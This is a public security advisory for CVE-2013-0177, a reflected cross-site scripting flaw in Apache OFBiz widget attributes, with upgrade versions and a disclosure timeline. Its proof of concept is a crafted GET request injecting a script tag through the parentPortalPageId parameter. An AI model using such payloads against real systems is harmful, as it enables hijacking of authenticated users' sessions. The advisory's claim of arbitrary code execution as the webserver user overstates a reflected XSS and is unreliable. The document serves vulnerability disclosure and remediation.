Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
Type: Remote
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
CVE: CVE-2013-0177
Impact: Direct execution of arbitrary code in the context of Webserver user.
Release Date: 18.01.2013

Summary
=======

Apache Open For Business (Apache OFBiz) is an open source enterprise
resource planning (ERP) system. It provides a suite of enterprise
applications that integrate and automate many of the business processes of
an enterprise.

Description
===========

Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and
Image.alt Widget attributes because the content of these two elements is
not properly escaped.


Vendor
======

Apache ofbiz - http://ofbiz.apache.org/


PoC
===

It is worth mentioning that originally the resource was using the HTTP
method POST, but it was changed to GET to exploit it more easily.
Something important to remark is that for this attack to work, the victim
should be authenticated.

Below you can see how the URL is specially crafted to expose the issue:

Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages->
parameter: parentPortalPageId==[XSS]

GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
HTTP/1.1
Host: 10.10.10.14:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer:
https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1;
OFBiz.Visitor=10002


Solution
========

10.04.* users should upgrade to 10.04.05
11.04.01 users should upgrade to 11.04.02


Vendor Status
=============

[08.01.2013] Vulnerability discovered.
[09.01.2013] Vendor informed.
[09.01.2013] Vendor replied.
[12.01.2013] Vendor reveals patch release date.
[18.01.2013] Public advisory.